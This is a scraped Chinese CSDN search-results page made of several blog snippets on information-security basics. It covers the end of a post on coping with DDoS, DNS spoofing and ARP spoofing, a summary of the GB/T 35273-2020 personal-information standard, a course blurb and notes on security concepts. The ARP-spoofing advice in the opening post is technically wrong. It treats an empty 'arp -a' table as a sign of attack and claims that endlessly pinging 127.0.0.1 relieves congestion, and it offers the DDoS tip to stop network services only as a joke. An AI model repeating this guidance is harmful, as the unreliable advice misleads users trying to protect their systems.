    • 关闭不必要的端口

    如何应对攻击

    接下来,我们来看看如何应对攻击

    应对DDoS攻击
    其实目前对上DDoS攻击都是个很烦事情。
    要想完全不受DDos攻击的危害——断网。
    打开cmd窗口,输入net stop Service,关闭Windows网络服务。
    关闭后,即可免遭危害。(滑稽)

    应对DNS欺骗
    重启网络路由,将浏览器全部还原为原设置。

    应对ARP欺骗
    重启网络路由,将浏览器(需要网络的软件)全部还原为默认设置。接着打开cmd窗口,输入arp -a,如果显示:没有ARP缓存表,说明你还在遭遇此攻击,否则你就已脱离了危险。接着,输入ping -t -l 10 127.0.0.1 ,不停地PING轮回IP,使其防止网络堵塞,还可能会摆脱危险。接着,打开资源监视器,找到网络,看看是谁在不断给你发送ARP数据包。找到后,立即找专业人员进行询问和修理,并且将此IP提交给专业人员。

    参考资料

    [1] Python3.7黑帽编程——病毒篇(基础篇):tiantian520_tt
    [2] 计算机病毒类型:发烧友学院
    [3]各类计算机病毒介绍:薛定谔的小橙子
    [4] Fiddler抓包工具总结:代码改变世界
    [5]常用的几款抓包工具:白清羽
    [6] 黑客的基础知识:残念( ̄▽ ̄)/王司徒
    [7]计算机网络安全——保护自己的计算机(基础)

    展开全文
  • 近年,随着信息技术的快速发展和互联网应用的普及,越来越多的组织大量收集、使用个人信息,给人们生活带来便利的同时,也出现了对个人信息的非法收集、滥用、泄露等问题,个人信息安全面临严重威胁。本标准针对个人...

    GB/T 35273—2020《信息安全技术个人信息安全规范》

    2020年3月6日,国家市场监督管理总局国家标准化管理委员会正式发布 GB/T 35273—2020《信息安全技术个人信息安全规范》

    GB/T 35273—2020《信息安全技术个人信息安全规范》标准是按照GB/T
    1.1—2009给出的规则起草,2020年10月1日正式实施,届时将代替原GB/T 35273-2017《信息安全技术个人信息安全规范》标准

    GB/T 35273—2020 与 GB/T 35273-2017相比,主要有变化如下:

    • 增加了“多项业务功能的自主选择”
    • 修改了“征得授权同意的例外;
    • 增加了“用户画像的使用限制”
    • 增加了“个性化展示的使用”
    • 增加了“基于不同业务目所收集个人信息的汇聚融合”
    • 修改了“个人信息主体注销账户”
    • 增加了“第三方接入管理”(见9.7);
    • 修改了“明确责任部门与人员”;
    • 增加了“个人信息安全工程”;
    • 增加了“个人信息处理活动记录”;
    • 修改了“实现个人信息主体自主意愿的方法”

    附下载地址:download.csdn.net/download/weixin_46192679/12234069


    在这里插入图片描述

    展开全文
  • 课程紧跟软考信息安全工程师考试大纲,通过作者多年的软考辅导经验及实际的信息安全工作实战经历,本视频教程对信安考试中的所有知识点进行了详细的讲解及总结;对于软考中重点考、反复考的知识点做了强化训练;对于...
  • 信息安全技术基础(1)

    千次阅读 2020-02-21 21:33:40
    1.对计算机系统威胁的三个方面 直接对计算机的硬件设备进行破坏; 对存放在存储设备中的信息...计算机外部安全:外部硬件安全和信息安全的相关制度以及法律规定等; 计算机内部安全:指计算机在存储介质上的安全,...

    1.对计算机系统威胁的三个方面

    1. 直接对计算机的硬件设备进行破坏;
    2. 对存放在存储设备中的信息进行非法获取;
    3. 在信息传输过程中进行非法获取

    2.影响计算机安全的不确定性因素

    1. 自然环境
    2. 人为失误
    3. 人为恶意破坏
    4. 软件设计的不完善

    3.计算机的安全

    包括计算机的外部安全和计算机的内部安全;
    计算机外部安全:外部硬件安全和信息安全的相关制度以及法律规定等;
    计算机内部安全:指计算机在存储介质上的安全,即软件保护,软件安全和数据安全等;

    计算机的信息安全有三种特性:完整性、可用性、保密性;

    对计算机网络安全可以进行边界防卫入侵检测安全反应

    计算机系统的安全策略是指在一定的环境下,保证一定级别的安全所提出来的政策法规层安全管理层以及安全技术层

    4.OSI信息安全体系

    ISO7498-2标准包包括了5类安全服务以及提供这些服务所需要的8类安全机制;
    安全服务:鉴别服务;访问控制服务;数据保密性;数据完整性;禁止否认服务;
    安全机制:加密机制;数字签名机制;访问控制机制;鉴别交换机制;数据完整性机制;业务填充机制;路由控制机制;公证机制;

    5.计算机系统的可靠性

    在给定的时间内,在一定的条件下,计算机系统能完成的应有功能的能力;
    提高计算机系统的可靠性可以采取容错和避错两个措施;
    避错是指提高计算机的物理性能;而容错是提高计算机的软件设计合理性;
    容错系统工作包括自动检测、自动切换、和自动回复;

    展开全文
  • 信息安全基础知识

    千次阅读 2019-06-08 17:00:00
    网络信息安全基础知识 1 计算机网络 计算机网络是利用通信线路将不同地理位置、功能不相同的 计算机和通信设备连接起来,实现资源的共享和信息的传递等目的地计算机系统。 主要有局域网、城域网、广域网等 1.2 信息...
  • 第1章:信息安全基础 1.1 信息安全概念 欢迎加入最棒的信息安全工程师社群,分享信息安全工程师备考干货资料。 备考交流QQ群:39460595 https://www.moondream.cn/?p=517 一.大纲要求 1.1 了解网络空间的...
  • 信息安全与网络安全的区别

    千次阅读 2019-10-16 08:55:23
    信息安全包括网络安全,信息安全还包括操作系统安全,数据库安全,硬件设备和设施安全,物理安全,人员安全,软件开发,应用安全等。 二、针对的设备不同 网络安全侧重于研究网络环境下的计算机安全,信息安全侧重于...
  • 企业信息安全的范围技术控制:访问控制:对权限、对账户的控制,例如:控制某个账户可以访问某个系统或者不可以访问某个系统网络安全:局域网、广域网、城域网、交换机的配置、防火墙配置、路由器配置等等系统安全:...
  • 信息安全

    千次阅读 2011-10-24 20:14:22
    信息安全本身包括的范围很大。大到国家军事政治等机密安全,小到如防范商业企业机密泄露、防范青少年对不良信息的浏览、个人信息的泄露等。网络环境下的信息安全体系是保证信息安全的关键,包括计算机安全操作系统、...
  • 1.3 信息安全管理基础 欢迎加入最棒的信息安全工程师社群,分享信息安全工程师备考干货资料。 备考交流QQ群:39460595 https://www.moondream.cn/?p=521 一.大纲要求 1.3.1 信息安全管理制度与政策 * 熟悉...
  • 1.信息安全简介 勒索病毒----2013年9月CryptoLocker “永恒之蓝”:主要是利用Windows系统的共享漏洞:445端口等。 “永恒之蓝”传播的勒索病毒以ONION和WNCRY两个家族为主,受 害机器的磁盘文件会被篡改为相应...
  • 信息安全期末复习整理

    万次阅读 2019-10-18 19:45:02
    信息安全期末复习整理。适用于韦老师2019《信息安全期末考试》。
  • 根据新的软考信息安全工程师考试大纲和作者长期辅导考试的经验,对考试中的所有知识点进行了详细的讲解,为考试和自身能力提高打下坚实基础。通过对考查知识点的细致讲解,让考生掌握解题思路和方法,做到举一反三,...
  • ISO27001信息安全管理体系

    万次阅读 2018-11-05 18:59:00
    初入甲方,刚开始接触的应该就是ISO27001信息安全管理体系,你拿到的应该就是一整套安全管理类的文档。在甲方,稍微有点规模的公司很注重制度和流程,岗位职责分工明细,那么这些安全管理制度,就是你所能掌控的...
  • 课程紧跟软考信息安全工程师考试大纲,通过作者多年的软考辅导经验及实际的信息安全工作实战经历,本视频课程对信安考试中的所有知识点进行了详细的讲解及总结;对于考试中重点考、反复考的知识点做了强化训练;对于...
  • 信息内容安全包括两部分:合法信息的保护和非法信息的监管; 信息隐藏和信息加密: 加密是把信息内容保护加密保护起来,不被旁人看到;而隐藏是将隐匿信息信息中,同时保证信息的可用性,保护的是版权; 内容保护...
  • 信息安全系统和安全体系

    千次阅读 2019-01-13 15:00:29
    信息安全系统是基于OSI网络模型,通过安全机制和安全服务达成信息安全的系统。安全机制是提供某些安全服务,利用各种安全技术和技巧,形成的一个较为完善的结构体系。安全服务是从网络中的各个层次提供信息应用系统...
  • 信息安全三要素CIA

    万次阅读 2019-07-18 15:01:58
    保密性(Confidentiality)、完整性(Integrity)和可用性(Availability)是信息安全的三大基石。 1)保密性:保证信息不泄露给未经授权的用户。 2)完整性:保证信息从真实的发信者传送到真实的收信者手中,传送...
  • 根据最新的软考信息安全工程师考试大纲和作者长期辅导考试的经验,对历年考试真题进行了详细解析和总结,挖掘其中的考试热点、重点、难点和基点,并准确把握考试的重点和难点,对其进行了详细的分析和讲解。...
  • 信息安全四大顶会

    千次阅读 2019-07-23 16:32:00
    IEEE Symposium on Security and Privacy (Oakland) Usenix Security Symposium ACM Computer and Communications Security Conference (CSS) Symposium on Network and Distributed System Security (NDSS)
  • 物联网信息安全作业

    千次阅读 2019-04-16 17:21:57
    物联网信息安全 我们有没有想过,当我们享受着物联网给生活带来的便利时,看不见的安全威胁可能已经发生。 近年来,物联网技术不断发展与创新,深刻改变着传统产业形态和人们生活方式,随着数以亿计的设备接入物联网...
  • 信息安全等级保护

    千次阅读 2019-07-05 15:43:48
    等保简单理解就是,对网络安全的一个整体评估。 位于哪一个环节呢?往下看。 先了解下集成项目的实施流程: 招投标书制定——总体设计规划(ip地址,网络拓扑)——项目实施制定——开始实施——业务运行测试——...
  • 信息安全基础知识理论总结 信息安全概述 密码学 数字签名 信息隐藏 计算机病毒、木马、蠕虫 计算机网络 网络安全(防火墙,入侵检测系统,入侵防御系统,拒绝服务攻击/分布式拒绝服务攻击) 网络安全协议理论与技术...
  • 物联网信息安全心得

    千次阅读 2019-04-19 15:38:25
    物联网产业的热潮正在席卷全球,它被誉为继计算机、互联网、移动通信网之后的又一次信息产业浪潮。早在1999年,物联网(The Internet of things)的概念就被提出来,它是指通过射频识别(RFID)、红外感应器、全球...
  • Kali Linux 网络安全渗透测试

    千人学习 2019-06-02 10:28:53
    现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都...

空空如也

1 2 3 4 5 ... 20
收藏数 111,081
精华内容 44,432
关键字:

信息安全